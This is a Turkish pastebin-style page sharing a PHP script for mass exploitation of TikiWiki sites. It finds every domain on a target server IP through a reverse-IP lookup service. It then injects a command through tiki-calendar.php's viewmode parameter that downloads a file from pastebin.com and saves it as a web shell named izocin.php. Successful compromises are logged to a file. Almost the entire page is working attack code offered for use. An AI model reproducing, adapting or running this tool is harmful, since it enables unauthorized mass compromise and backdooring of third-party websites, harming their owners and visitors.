Uyarı!

Sistemimizden daha iyi faydalanabilmek için Üye Olmanız yada Giriş Yapmanız gerekmektedir. yada Şifremi Unuttum tıkla

Pastebin | Pastebin Ekle

TikiWiki Server Mass Auto Shell Upload | Server ip Mass Scann Tikiwiki auto Upload Priv8

skycOde tarafından ... 31.08.2016 - 09:40
|
			<?php
error_reporting(0);
echo"\n\n
[#]==================================================[#]
[#]==  TikiWiki AutoShell [ Priv8 ]    ==============[#]
[#]=   exapmle: php http.//site.com  ================[#]
[#]=   Coded By: izocin  ============================[#]
[#]==================================================[#]
\n\n";

echo "Server Target IP : ";
$ip=trim(fgets(STDIN,1024));
$sth = "http://domains.yougetsignal.com/domains.php";
$ch = curl_init($sth);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
    curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$ip&ket=");
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_POST, 1);
    $resp = curl_exec($ch);
    $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
    $array = explode(",,", $resp);
    unset($array[0]);
	echo "\n\t Total site loaded : ".count($array)."\n\n";
	
    foreach($array as $izox)
    {

$site = "http://$izox";



	        $lolz='/tiki-calendar.php?viewmode=%27;print(system(%27wget%20http://pastebin.com/raw/ypvfjtMQ;mv%20ypvfjtMQ%20izocin.php%27));$a=%27';
                $sp = "/izocin.php";
		$url = $site.$lolz;
		$ch = curl_init();
		curl_setopt($ch,CURLOPT_URL,$url);
		curl_setopt($ch,CURLOPT_POST,1);
		curl_setopt($ch,CURLOPT_POSTFIELDS,array());
		curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
		curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,3);
	        curl_setopt($ch,CURLOPT_TIMEOUT,3);
		$data = curl_exec($ch);
echo "--------------------------------------------------------------------------\n";
		echo "[#] Scaning : $site\n";
		$lol = $site.$sp;
		$cnlol = @file_get_contents($lol);
			if(preg_match('#Blackhats#i',$cnlol)){
			echo "\n\t[#] Success :)\n\t[#]$lol\n\t----------------------------------------------------------------\n\n";
			            $save = fopen ('tikiki.txt','a+');
                                    fwrite ($save,$lol."\n");
			
			}else{
				echo "\n\t[!]Exploit Failed\n\n";}
}

?>